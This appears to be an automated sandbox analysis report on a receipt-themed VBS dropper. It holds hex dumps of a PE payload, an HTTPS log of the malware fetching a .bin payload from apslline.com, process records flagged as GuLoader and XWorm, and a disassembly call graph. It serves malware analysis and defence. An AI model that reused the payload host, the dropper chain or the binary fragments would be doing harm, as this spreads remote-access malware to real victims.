                                                                      2024-10-15 14:37:15 UTC7982INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 e1 80 40 ec 80 ee 13 ec 80 ee 13 ec 80 ee 13 2f 8f b1 13 ee 80 ee 13 ec 80 ef 13 72 80 ee 13 2f 8f b3 13 e3 80 ee 13 b8 a3 de 13 e0 80 ee 13 2b 86 e8 13 ed 80 ee 13 52 69 63 68 ec 80 ee 13 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d5 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 b8 39 00 00 04 00 00 48 32 00 00 00 10 00 00 00 80 00 00 00 00 40
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@/r/+RichPEL]b9H2@
                                                                      2024-10-15 14:37:15 UTC8000INData Raw: 74 24 08 85 f6 57 8b c6 7d 02 f7 d8 8b 15 24 b8 40 00 8b c8 83 e1 0f c1 f8 04 ff 34 8a c1 e0 0a 05 e8 a3 40 00 50 e8 b6 34 00 00 85 f6 8b f8 7d 06 57 e8 f2 36 00 00 8b c7 5f 5e c2 04 00 55 8b ec 8d 45 08 50 8b 45 08 0d 20 00 10 00 50 6a 22 e8 a9 ff ff ff 50 a1 24 b8 40 00 ff 70 04 e8 13 00 00 00 50 e8 dc 32 00 00 f7 d8 1b c0 f7 d0 23 45 08 5d c2 04 00 8b 44 24 04 85 c0 7c 0d 8b 0d e4 2f 7a 00 8d 84 01 01 00 00 80 c2 04 00 55 8b ec 8d 45 10 50 8b 45 10 0d 20 00 10 00 50 ff 75 0c ff 75 08 e8 cd ff ff ff 50 e8 c4 32 00 00 f7 d8 1b c0 f7 d0 23 45 10 5d c2 0c 00 55 8b ec 56 8b 75 0c 80 3e 00 75 07 b8 eb 03 00 00 eb 2c 81 4d 10 20 00 10 00 8d 45 10 50 ff 75 08 e8 94 ff ff ff 50 e8 e2 31 00 00 85 c0 74 0c ff 75 10 56 50 e8 0a 00 00 00 eb 03 6a 06 58 5e 5d c2 0c
                                                                      Data Ascii: t$W}$@4@P4}W6_^UEPE Pj"P$@pP2#E]D$|/zUEPE PuuP2#E]UVu>u,M EPuP1tuVPjX^]
                                                                      2024-10-15 14:37:15 UTC8000INData Raw: 0c e8 97 c9 ff ff 57 56 e8 72 15 00 00 5f 5e c2 08 00 55 8b ec 83 ec 54 53 56 8b 35 d0 81 40 00 57 68 f9 03 00 00 ff 75 08 ff d6 68 08 04 00 00 89 45 f8 ff 75 08 ff d6 89 45 fc a1 88 2f 7a 00 8b 35 00 82 40 00 89 45 ec a1 54 2f 7a 00 33 db 05 94 00 00 00 81 7d 0c 10 01 00 00 6a 10 89 45 e8 5f 0f 85 27 02 00 00 8b 45 08 89 5d e0 a3 c0 2f 7a 00 a1 8c 2f 7a 00 c1 e0 02 50 6a 40 c7 45 f0 02 00 00 00 ff 15 58 81 40 00 53 53 53 53 6a 6e a3 40 f5 79 00 ff 35 40 2f 7a 00 ff 15 34 82 40 00 83 0d 34 f5 79 00 ff 68 88 50 40 00 6a fc 89 45 f4 ff 75 fc ff 15 4c 82 40 00 53 6a 06 6a 21 57 57 a3 3c f5 79 00 ff 15 38 80 40 00 68 ff 00 ff 00 a3 2c f5 79 00 ff 75 f4 50 ff 15 3c 80 40 00 ff 35 2c f5 79 00 6a 02 68 09 11 00 00 ff 75 fc ff d6 53 53 68 1c 11 00 00 ff 75 fc ff
                                                                      Data Ascii: WVr_^UTSV5@WhuhEuE/z5@ET/z3}jE_'E]/z/zPj@EX@SSSSjn@y5@/z4@4yhP@jEuL@Sjj!WW<y8@h,yuP<@5,yjhuSShu
                                                                      2024-10-15 14:37:15 UTC8000INData Raw: 6a 05 50 c6 43 10 15 e8 60 05 00 00 85 c0 0f 85 05 05 00 00 21 45 94 eb d0 83 65 9c 00 85 c0 0f 8e 8b 00 00 00 8b 7d a0 33 d2 6a 20 3b fa 5e 89 55 94 7e 2b 8b 45 9c 69 c0 02 01 00 00 8d 8c 18 b0 99 37 00 8b 45 94 0f b6 04 01 3b c2 7e 02 8b d0 3b c6 7d 02 8b f0 ff 45 94 39 7d 94 7c e5 8b 4d 9c 8b 45 9c 69 c9 02 01 00 00 69 c0 08 04 00 00 57 03 c3 52 8d 8c 19 b0 99 37 00 56 51 8d 88 1c d0 37 00 51 8d 88 ec b7 37 00 05 bc 9f 37 00 51 50 e8 bb 05 00 00 8b 45 9c 89 b4 83 4c e8 37 00 ff 45 9c 8b 45 9c 3b 45 a4 0f 8c 75 ff ff ff 8b 83 b8 fa 36 00 83 4d b0 ff 40 c7 45 bc a0 bb 0d 00 89 45 ac 33 c0 89 45 b4 89 45 94 8b 4d 94 89 44 8b 30 ff 45 94 81 7d 94 ff 00 00 00 7e ed 6a 0f be ff 0f 00 00 58 8d bb 08 0d 37 00 8a c8 c7 45 fc 0f 00 00 00 c0 e1 04 8a 55 fc 02 d1
                                                                      Data Ascii: jPC`!Ee}3j ;^U~+Ei7E;~;}E9}|MEiiWR7VQ7Q77QPEL7EE;Eu6M@EE3EEMD0E}~jX7EU
                                                                      2024-10-15 14:37:16 UTC8000INData Raw: 72 50 61 74 68 41 00 00 00 00 53 48 46 4f 4c 44 45 52 00 00 00 00 53 48 41 75 74 6f 43 6f 6d 70 6c 65 74 65 00 00 53 48 4c 57 41 50 49 00 53 48 45 4c 4c 33 32 00 49 6e 69 74 69 61 74 65 53 68 75 74 64 6f 77 6e 41 00 00 00 52 65 67 44 65 6c 65 74 65 4b 65 79 45 78 41 00 41 44 56 41 50 49 33 32 00 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 55 49 4c 61 6e 67 75 61 67 65 00 00 00 00 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 45 78 41 00 53 65 74 44 65 66 61 75 6c 74 44 6c 6c 44 69 72 65 63 74 6f 72 69 65 73 00 00 00 00 4b 45 52 4e 45 4c 33 32 00 00 00 00 5c 2a 2e 2a 00 00 00 00 6e 73 61 00 0a 5b 00 00 5b 52 65 6e 61 6d 65 5d 0d 0a 00 00 25 73 3d 25 73 0d 0a 00 2a 3f 7c 3c 3e 2f 22 3a 00 00 00 00 25 73 25 73 2e 64 6c 6c 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: rPathASHFOLDERSHAutoCompleteSHLWAPISHELL32InitiateShutdownARegDeleteKeyExAADVAPI32GetUserDefaultUILanguageGetDiskFreeSpaceExASetDefaultDllDirectoriesKERNEL32\*.*nsa[[Rename]%s=%s*?|<>/":%s%s.dll
                                                                      2024-10-15 14:37:16 UTC8000INData Raw: a8 08 ff 37 14 09 f1 02 bd 97 77 a0 f6 df 70 c3 05 ab 6f 62 fe ed 1e 93 29 9d 87 4b c5 44 75 3a 51 ed 35 20 17 c5 43 23 65 59 f2 1a f3 cd d7 f1 cc 6a 83 cf 3c b7 c4 63 72 06 e9 d7 a0 08 4c 5a f4 ec a0 e2 e0 a5 8e 1c 9d 38 03 4a 60 d1 28 d6 39 e0 f6 3a 43 d5 61 ee 0b 3e 72 a3 c5 d3 cb 04 d9 dc af 6d 08 a6 cc c5 ee 3d c8 2e a3 91 fa 2d 72 4c 17 14 68 10 42 43 90 84 c6 b6 40 5a 57 4e 82 08 62 f1 d7 48 d9 cf 25 bd 78 ba dd de ba be 5c a6 f3 61 78 cf 86 02 57 06 e0 0f 21 07 07 1f e5 30 9c 7f 78 b3 3d fd 8f 21 b3 1f 13 bf e7 ea 00 8b da 0a cb 73 e0 b5 83 19 9f b9 b1 c0 6a 78 93 6e 38 61 70 0e ad 53 2e e6 1d 0f 0e 0e d1 75 2d 83 13 06 25 43 4d f9 31 a8 70 34 06 ac f9 7f c2 39 cf 07 79 c9 2f dc 0b f8 f5 b7 06 be fc 30 f3 b5 b3 88 ac 81 82 c2 cd 50 38 b0 05 9a 7d
                                                                      Data Ascii: 7wpob)KDu:Q5 C#eYj<crLZ8J`(9:Ca>rm=.-rLhBC@ZWNbH%x\axW!0x=!sjxn8apS.u-%CM1p49y/0P8}
                                                                      2024-10-15 14:37:16 UTC8000INData Raw: 5b d0 4e 77 7a b6 2c 3c 9d cf 58 4f 67 2d e7 7b ae a7 7b ac e7 67 3a 9d 9f 71 3d df a3 9f ee b1 9c 9e ab af cf 68 ed 1e 66 77 6a cb 3d fb fa 0c d6 ee e6 f6 6f 18 83 8a 24 15 45 6d c5 00 c7 06 e4 96 c8 2d 94 03 8c 10 22 aa 3c 8c 00 46 48 fb f5 c2 cc 40 66 48 ba 16 22 9f 21 c1 68 7e 0f 97 a3 c8 a9 0b 85 0b 94 4d 39 c8 dc 01 b5 2e b6 c6 75 29 51 d0 3e 44 9f 11 62 63 cc 73 b1 11 c8 9c c8 33 a0 34 a9 35 66 00 63 48 19 5b 89 7f 00 cd c2 1c b3 e4 de 29 bf af f4 9b 2d eb 7e 26 64 a4 94 83 92 81 83 c2 d5 98 b3 ff b2 a5 91 dd 20 b9 90 20 3d c1 00 14 52 ee 49 21 91 9c 88 1a 89 f7 b3 ea c9 e9 15 39 02 1c 15 37 a8 5b 2c 48 f9 6c 12 42 1e da ba 82 0b a9 00 68 8a dc d8 30 66 1e 40 59 88 8e f5 8b 29 72 9a c5 03 8d c2 da 9b d6 65 99 34 f0 0d b1 03 28 1d e2 c6 82 23 42 d8
                                                                      Data Ascii: [Nwz,<XOg-{{g:q=hfwj=o$Em-"<FH@fH"!h~M9.u)Q>Dbcs345fcH[)-~&d =RI!97[,HlBh0f@Y)re4(#B
                                                                      2024-10-15 14:37:16 UTC8000INData Raw: da 02 56 6e 85 03 29 f5 4c bc 00 70 fa a3 af b3 f2 ef 7e f4 11 7f e7 47 3f fa b9 32 01 5f 6b 03 60 c6 ea c8 57 bd b5 35 c7 86 71 bd b2 84 2f a9 bb f3 99 af 5e be 78 ca 54 54 f5 ba 51 cc 1a 9d c4 e2 65 e6 e9 0e 5c 07 b4 cf 58 eb 79 f8 94 61 22 39 63 b3 c1 c8 a2 f8 34 f7 5f a3 e4 24 b7 10 ae 03 5a 1b b9 36 a1 35 68 0b 70 64 b5 1c 23 ea 7e b3 0d 50 37 72 38 30 1a d4 13 ac 71 d9 50 6b 62 6f c2 18 a1 36 a7 52 29 6b 0a 5d 8c a2 b8 cd 5c 00 6b 4a 8f 86 a0 4e 2c c0 52 d5 de 0c 83 82 34 7d 84 d3 6b a0 a5 83 65 69 5d 64 24 af b8 22 f6 82 0c cb d0 17 32 6b 4c cf a2 ed 22 59 93 ca bc 8e 5a b3 93 3a 4c 25 a6 b1 69 a4 7a 77 b6 56 1a ca 4c 90 95 6e 24 02 f4 56 15 14 cd 44 b3 04 81 ed 42 c5 be 31 73 87 b3 b4 83 7c a4 01 58 b5 2e a5 6a 3c df 35 3d 3e 92 dc b6 f2 06 84 94
                                                                      Data Ascii: Vn)Lp~G?2_k`W5q/^xTTQe\Xya"9c4_$Z65hpd#~P7r80qPkbo6R)k]\kJN,R4}kei]d$"2kL"YZ:L%izwVLn$VDB1s|X.j<5=>
                                                                      2024-10-15 14:37:16 UTC8000INData Raw: 80 b7 95 b1 1e b2 c1 29 7a 22 03 8d ed 24 51 80 83 06 cd f1 a9 2f 34 38 8f 09 3a 79 1f b3 a7 db a3 84 48 f4 30 b3 8f a7 57 fc d5 f7 1c 7f e3 2b 6f e0 9a 9f 70 13 44 7d e9 f1 00 19 86 4f d6 1d be 7d 0b 1e 3a 40 99 b3 76 09 b1 4b 7e e0 15 7d 79 86 6f 7d f6 29 ff c4 c3 0b fc a5 a7 0f 71 d9 9e 67 0c 67 80 df 43 41 72 0d 3c 95 d0 5b d0 a6 c5 38 08 a0 49 aa 25 f8 4d 55 b3 89 a7 fb 2a 87 0e 1c 7b c0 f9 b9 4a e1 e7 63 c3 d7 2e 06 9f 9f 01 78 53 78 bf 84 c8 9e d1 05 9e 4c ac 20 e4 e2 72 87 47 0f 1f 51 d4 06 f4 39 83 61 5b cc b6 12 60 64 02 5c 35 64 69 86 5a c8 5d 95 31 12 4b c7 a0 e6 e9 17 e0 31 f8 f5 2a 28 9a 5a 33 dd 81 28 18 e3 a5 53 b9 27 a9 b4 23 27 6d 00 b7 24 b3 ed 6a 72 e5 4d c9 aa 22 2b 73 f4 d6 5c c4 3a 61 35 09 34 1b 2b 71 f4 af 31 04 75 a8 9a ba 05 ee
                                                                      Data Ascii: )z"$Q/48:yH0W+opD}O}:@vK~}yo})qggCAr<[8I%MU*{Jc.xSxL rGQ9a[`d\5diZ]1K1*(Z3(S'#'m$jrM"+s\:a54+q1u
                                                                      2024-10-15 14:37:16 UTC8000INData Raw: a6 3e a1 02 74 8e 1a 09 de 16 aa 65 3d 4d 74 ba 37 30 22 e1 ba a2 14 9d a1 3a 23 78 24 e3 05 88 b4 42 4f ae aa 83 5a 29 82 c4 aa d0 49 9b 21 5a 90 f8 f8 42 f2 f4 79 48 76 0c 71 5d 9a 14 6c d6 7b 64 36 d8 a5 08 d5 88 52 81 a9 1a 5a ab 64 64 4f 22 7d a5 04 84 83 b1 9c 4a cb 3c af 32 6a 99 e0 a3 41 06 1a 99 47 38 2e 0a bf 7f 09 f0 6a 9a 7f 16 2e 04 ee a7 05 75 cf ef c8 8f e0 7f b3 4f f0 bc 4f d4 8b 07 d0 72 05 b5 7d 4a 95 25 f6 e1 f4 48 19 f9 c4 28 85 21 32 54 91 b3 31 96 3a 0b dc 0d cd 82 15 40 03 a2 8d 49 47 07 e3 00 70 f9 70 d4 ff 0d df 3f fd 7f 29 88 5f f9 db d9 c7 7c 29 fd 97 d7 dc e7 f5 0b c0 e5 0f ff 8b e2 6d d9 43 64 0f 86 d0 57 0a 52 c9 ed fa ea 82 57 d7 57 49 d1 88 6d 0a 90 19 80 67 01 9e 78 28 30 49 3b a6 e9 78 6b 14 55 47 96 74 94 ee 01 73 65 6b
                                                                      Data Ascii: >te=Mt70":#x$BOZ)I!ZByHvq]l{d6RZddO"}J<2jAG8.j.uOOr}J%H(!2T1:@IGpp?)_|)mCdWRWWImgx(0I;xkUGtsek


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449737103.53.40.624437924C:\ProgramData\filaucioso.bat
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 14:37:55 UTC174OUTGET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1
                                                                      User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                      Host: apslline.com
                                                                      Cache-Control: no-cache
                                                                      2024-10-15 14:37:55 UTC248INHTTP/1.1 200 OK
                                                                      Date: Tue, 15 Oct 2024 14:37:55 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Last-Modified: Sat, 12 Oct 2024 18:13:57 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 34368
                                                                      Content-Type: application/octet-stream
                                                                      2024-10-15 14:37:55 UTC7944INData Raw: b4 cc 81 6b 2b c5 ca 92 33 f6 f5 19 a9 8f 73 07 dd df 64 22 2a 70 33 20 60 b4 85 65 f2 8d 9f 4f de c7 71 8e 08 27 8a cd 5d a1 55 1c b2 0f 86 3b 66 a1 1c 89 6b 47 f2 ad b0 ad 9a d4 f9 3a 4d c8 14 75 01 67 03 41 cb 70 11 12 9b ba 6f c5 01 48 e3 46 98 fb ee c6 97 32 1f 69 48 ac ca 73 68 14 7b 10 ea f3 99 ad 6a 22 05 01 c7 70 0f ce dd 19 c0 50 c5 5f 3e 9b bd eb be 94 33 f0 8d 57 f2 8e e3 c9 b7 b4 c3 8a 0a 6e 34 e2 81 e8 72 57 c3 bd d1 da f0 70 78 fa b2 9c 3a 46 fb 12 d5 ec 4b 48 42 9f e3 97 85 0a 36 5e ac d1 be c7 90 4a 37 bc 9e d9 98 f0 cc 4f 10 63 5a 4e f7 c1 1c 8d 90 d9 02 dc ad 87 85 fc 8b a9 cb 79 10 1e 0f 97 4d 31 00 19 ec 12 89 4a c3 a4 3c 7b 59 f1 c9 fe 5f 87 ac a6 7a e8 b9 b6 2d d5 c3 2a b2 05 69 ac 25 2c 3d 50 9d 51 1d ff 9c 03 29 9b 17 43 6a 4e 7f
                                                                      Data Ascii: k+3sd"*p3 `eOq']U;fkG:MugApoHF2iHsh{j"pP_>3Wn4rWpx:FKHB6^J7OcZNyM1J<{Y_z-*i%,=PQ)CjN
                                                                      2024-10-15 14:37:55 UTC8000INData Raw: 86 33 f5 f4 9f 53 e3 42 77 fa 68 34 96 87 98 23 6f d1 27 72 0b ea ee ed 2b 28 3b 5a 5c ae 0d a9 78 dd 93 6d 93 00 67 cc 60 6b 5d ef ba 23 99 40 72 36 02 23 a2 2d 5e d0 d4 47 a0 7d 00 0a 58 a9 8c 2a 30 57 32 1c 3b f1 cd 76 21 48 94 92 09 de 8c 4a cb d1 5b a0 8c 96 97 74 5c b2 cd d4 ec eb 21 5f 00 70 f6 91 88 c6 53 e5 9e 50 ac 39 64 e7 dd 5d b7 15 5e fa 3b ce aa 77 85 cf 97 fe 7d 12 b6 2f 93 17 5a 50 43 1c c4 21 c7 e6 52 8d 7a f5 a5 fa 50 a5 c4 8e d4 ea 4f 71 6a 0a b8 58 dc 25 04 39 cd a2 29 cb fc b5 63 a7 09 d0 3e 1e 9d 40 65 85 1f e5 2a 5b dd 18 4a 82 1d 26 87 04 fc 50 cc e4 e2 cd 6e d1 50 29 e8 8b 2b 87 e2 18 ea d0 dd 72 52 66 ec 21 86 4a 0d e0 9a 36 1c 61 c7 fe cc e0 86 e7 b1 46 7a 92 9f 6a cc fa 53 09 a5 b6 1b 44 e4 c3 2b 8b 10 33 18 e6 06 e4 36 63 b3
                                                                      Data Ascii: 3SBwh4#o'r+(;Z\xmg`k]#@r6#-^G}X*0W2;v!HJ[t\!_pSP9d]^;w}/ZPC!RzPOqjX%9)c>@e*[J&PnP)+rRf!J6aFzjSD+36c
                                                                      2024-10-15 14:37:55 UTC8000INData Raw: 74 c4 00 9e f8 5b 29 32 38 c5 98 bb 84 87 94 5f 85 e7 38 d2 9a 5c a7 ce 70 da 12 26 ea ed 42 d6 42 2a d8 17 2e 49 85 b5 1b 17 07 8c 03 92 2f 8c 22 af 4d 92 26 5a fd fd 33 d6 b5 c4 bb c1 bb 7d 1c 77 1c 0d 93 0f 5c cd 15 85 f4 93 c6 b6 95 f2 b4 b4 04 3e 95 f2 f6 fb 93 32 60 00 53 8e c8 7d 41 0d d2 41 5e 99 a3 97 d1 c8 4a fc 74 7b c1 cd 05 5b 28 29 4c 1e 89 57 b2 c7 a0 17 d7 a1 64 35 d5 02 e4 d1 04 44 c0 48 8a aa 0c 95 93 8e bd 0a 27 0c 83 b6 91 6f a7 97 a6 66 56 f7 db 03 04 6b 0f 4e 04 66 f0 a9 cf 32 f9 44 1c ef 02 2e 7a 95 d8 53 21 a4 d1 41 08 d5 88 7b 56 37 64 41 e4 a7 0d 6b e8 76 3e f5 fa eb 10 7b 48 4d a5 68 ac d6 d0 ff 12 05 a1 fd 5d ea 28 30 9a a1 9b 53 43 9a 5c fd 6f 1c 4d 83 98 29 4f fb 94 76 0a f6 e9 ed 90 2c 3d 5a 48 8c cb a1 5e dd 92 6c 7b 04 e7
                                                                      Data Ascii: t[)28_8\p&BB*.I/"M&Z3}w\>2`S}AA^Jt{[()LWd5DH'ofVkNf2D.zS!A{V7dAkv>{HMh](0SC\oM)Ov,=ZH^l{
                                                                      2024-10-15 14:37:55 UTC8000INData Raw: 74 d4 8a cb b5 2e 08 2f 30 fa fa dc 68 d1 9c bf 10 33 8d 07 c3 40 1e 38 30 2d 56 27 ef 94 c1 ae 28 35 2c d0 23 1f e2 37 4d 35 3c 43 b7 4d a2 91 fc e1 eb 38 dc c4 e5 e9 d5 58 9e d3 bb d5 97 4b 4b 90 40 1b 48 f2 08 72 74 59 ed 93 43 2f 35 fb b0 ab 65 cc 0c a6 61 1b b0 f5 8c 65 e5 5c 46 99 f3 eb d6 0e e7 43 a9 06 2a 0a b9 ec 25 d0 90 66 34 6b 93 6e fa 55 6f c7 e9 ad 68 22 8a 9c 88 cc 40 9b b9 19 23 26 38 e3 81 9f 90 db 0a 52 c6 45 69 f3 b8 3d 15 2c 6f 80 0a 91 2c 61 c1 df e7 7c 7a 6a dc 64 e7 1d 7e 18 d9 3d 07 30 82 1e 54 73 4b f1 fd 89 29 13 e8 e7 ed c3 52 69 80 d5 b0 f0 d1 bc 63 a9 8c c8 7e 39 93 3e d1 1a 27 0d 42 a1 87 8c 83 dd cf 93 5f f8 21 aa 69 ea fb 1f 1d 50 3a 85 ec d8 bc e2 94 16 e8 86 5c b7 da 2b e3 a2 13 ac 70 41 8f 99 1d 9c 31 4f f9 14 5a 21 6b
                                                                      Data Ascii: t./0h3@80-V'(5,#7M5<CM8XKK@HrtYC/5eae\FC*%f4knUoh"@#&8REi=,o,a|zjd~=0TsK)Ric~9>'B_!iP:\+pA1OZ!k
                                                                      2024-10-15 14:37:55 UTC2424INData Raw: 76 08 cd d3 0b f1 48 c0 58 3c 95 a0 f7 b0 93 34 ed 08 59 e0 0c fc c4 3c bf cb 23 06 a7 13 48 02 91 b6 56 95 c7 3a 9c de 11 88 a8 dd ce 58 2a d5 6d a5 00 64 2e 31 bc 83 e0 27 4d 51 b0 15 be f0 e6 c6 87 51 92 f8 b1 f8 88 e7 50 9f 5c 62 5c 77 58 1a 8d 92 c5 4e 8b b8 81 c9 ff 80 b4 0b a0 96 58 0d 96 5f b0 11 08 6e 5f 79 4d c8 b8 32 66 4e ec cc 9e 43 9a b0 b3 66 f5 bb b3 2d d4 30 b4 ba 08 6e 8b 38 29 21 ec 81 4c 01 e2 c0 1e 2b a9 10 45 78 ce 76 67 70 24 03 28 c5 e7 72 c4 a5 7c 16 4b 88 36 ea 4b 70 f5 00 20 59 fa 07 19 38 de c0 07 f8 0e 7c 84 98 f3 90 59 ca bc 41 3a 32 a5 63 16 a5 76 40 a4 d2 49 ba 4d fa 27 2f 1e e8 57 62 eb e4 be ce c6 47 2c 24 4d d9 8c c1 b0 34 73 63 55 ae b6 9b 69 86 c8 8d 5d 67 cb 5e fa 33 4b 39 52 7b 5e 72 bf cd f8 89 70 38 62 86 62 4b bf
                                                                      Data Ascii: vHX<4Y<#HV:X*md.1'MQQP\b\wXNX_n_yM2fNCf-0n8)!L+Exvgp$(r|K6Kp Y8|YA:2cv@IM'/WbG,$M4scUi]g^3K9R{^rp8bbK


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:10:37:12
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\c56D7_Receipt.vbs"
                                                                      Imagebase:0x7ff6791b0000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:10:37:19
                                                                      Start date:15/10/2024
                                                                      Path:C:\ProgramData\filaucioso.bat
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\ProgramData\filaucioso.bat"
                                                                      Imagebase:0x400000
                                                                      File size:5'329'718 bytes
                                                                      MD5 hash:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2030976668.000000000503C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:10:37:43
                                                                      Start date:15/10/2024
                                                                      Path:C:\ProgramData\filaucioso.bat
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\ProgramData\filaucioso.bat"
                                                                      Imagebase:0x400000
                                                                      File size:5'329'718 bytes
                                                                      MD5 hash:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.3029149028.00000000337F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:20.2%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:16.4%
                                                                        Total number of Nodes:1535
                                                                        Total number of Limit Nodes:45
                                                                        execution_graph 4992 401d41 4993 401d54 GetDlgItem 4992->4993 4994 401d47 4992->4994 4996 401d4e 4993->4996 4995 402b0a 17 API calls 4994->4995 4995->4996 4997 401d8f GetClientRect LoadImageA SendMessageA 4996->4997 4999 402b2c 17 API calls 4996->4999 5000 401deb 4997->5000 5002 4029b8 4997->5002 4999->4997 5001 401df3 DeleteObject 5000->5001 5000->5002 5001->5002 5003 6e3a1638 5004 6e3a1667 5003->5004 5005 6e3a1a98 18 API calls 5004->5005 5006 6e3a166e 5005->5006 5007 6e3a1681 5006->5007 5008 6e3a1675 5006->5008 5010 6e3a168b 5007->5010 5011 6e3a16a8 5007->5011 5009 6e3a1266 2 API calls 5008->5009 5015 6e3a167f 5009->5015 5012 6e3a14e2 3 API calls 5010->5012 5013 6e3a16ae 5011->5013 5014 6e3a16d2 5011->5014 5016 6e3a1690 5012->5016 5017 6e3a1559 3 API calls 5013->5017 5018 6e3a14e2 3 API calls 5014->5018 5019 6e3a1559 3 API calls 5016->5019 5020 6e3a16b3 5017->5020 5018->5015 5021 6e3a1696 5019->5021 5022 6e3a1266 2 API calls 5020->5022 5023 6e3a1266 2 API calls 5021->5023 5024 6e3a16b9 GlobalFree 5022->5024 5025 6e3a169c GlobalFree 5023->5025 5024->5015 5026 6e3a16cd GlobalFree 5024->5026 5025->5015 5026->5015 5027 401ec3 5028 402b2c 17 API calls 5027->5028 5029 401ec9 5028->5029 5030 402b2c 17 API calls 5029->5030 5031 401ed2 5030->5031 5032 402b2c 17 API calls 5031->5032 5033 401edb 5032->5033 5034 402b2c 17 API calls 5033->5034 5035 401ee4 5034->5035 5036 401423 24 API calls 5035->5036 5037 401eeb 5036->5037 5044 4056cf ShellExecuteExA 5037->5044 5039 401f29 5040 4063fa 5 API calls 5039->5040 5042 402783 5039->5042 5041 401f43 CloseHandle 5040->5041 5041->5042 5044->5039 4000 401746 4001 402b2c 17 API calls 4000->4001 4002 40174d 4001->4002 4006 405bb5 4002->4006 4004 401754 4005 405bb5 2 API calls 4004->4005 4005->4004 4007 405bc0 GetTickCount GetTempFileNameA 4006->4007 4008 405bf1 4007->4008 4009 405bed 4007->4009 4008->4004 4009->4007 4009->4008 5045 4044c6 5046 4044d6 5045->5046 5047 4044fc 5045->5047 5048 40407b 18 API calls 5046->5048 5049 4040e2 8 API calls 5047->5049 5050 4044e3 SetDlgItemTextA 5048->5050 5051 404508 5049->5051 5050->5047 5052 6e3a103d 5055 6e3a101b 5052->5055 5062 6e3a14bb 5055->5062 5057 6e3a1020 5058 6e3a1027 GlobalAlloc 5057->5058 5059 6e3a1024 5057->5059 5058->5059 5060 6e3a14e2 3 API calls 5059->5060 5061 6e3a103b 5060->5061 5064 6e3a14c1 5062->5064 5063 6e3a14c7 5063->5057 5064->5063 5065 6e3a14d3 GlobalFree 5064->5065 5065->5057 5066 401947 5067 402b2c 17 API calls 5066->5067 5068 40194e lstrlenA 5067->5068 5069 4025e4 5068->5069 4117 401f48 4118 402b2c 17 API calls 4117->4118 4119 401f4e 4118->4119 4130 405114 4119->4130 4126 402783 4127 401f7f CloseHandle 4127->4126 4128 401f73 4128->4127 4149 405f4b wsprintfA 4128->4149 4131 40512f 4130->4131 4139 401f58 4130->4139 4132 40514c lstrlenA 4131->4132 4133 40600f 17 API calls 4131->4133 4134 405175 4132->4134 4135 40515a lstrlenA 4132->4135 4133->4132 4136 405188 4134->4136 4137 40517b SetWindowTextA 4134->4137 4138 40516c lstrcatA 4135->4138 4135->4139 4136->4139 4140 40518e SendMessageA SendMessageA SendMessageA 4136->4140 4137->4136 4138->4134 4141 40568c CreateProcessA 4139->4141 4140->4139 4142 401f5e 4141->4142 4143 4056bf CloseHandle 4141->4143 4142->4126 4142->4127 4144 4063fa WaitForSingleObject 4142->4144 4143->4142 4145 406414 4144->4145 4146 406426 GetExitCodeProcess 4145->4146 4150 4063c1 4145->4150 4146->4128 4149->4127 4151 4063de PeekMessageA 4150->4151 4152 4063d4 DispatchMessageA 4151->4152 4153 4063ee WaitForSingleObject 4151->4153 4152->4151 4153->4145 4154 403248 SetErrorMode GetVersion 4155 403289 4154->4155 4156 40328f 4154->4156 4157 406385 5 API calls 4155->4157 4244 406317 GetSystemDirectoryA 4156->4244 4157->4156 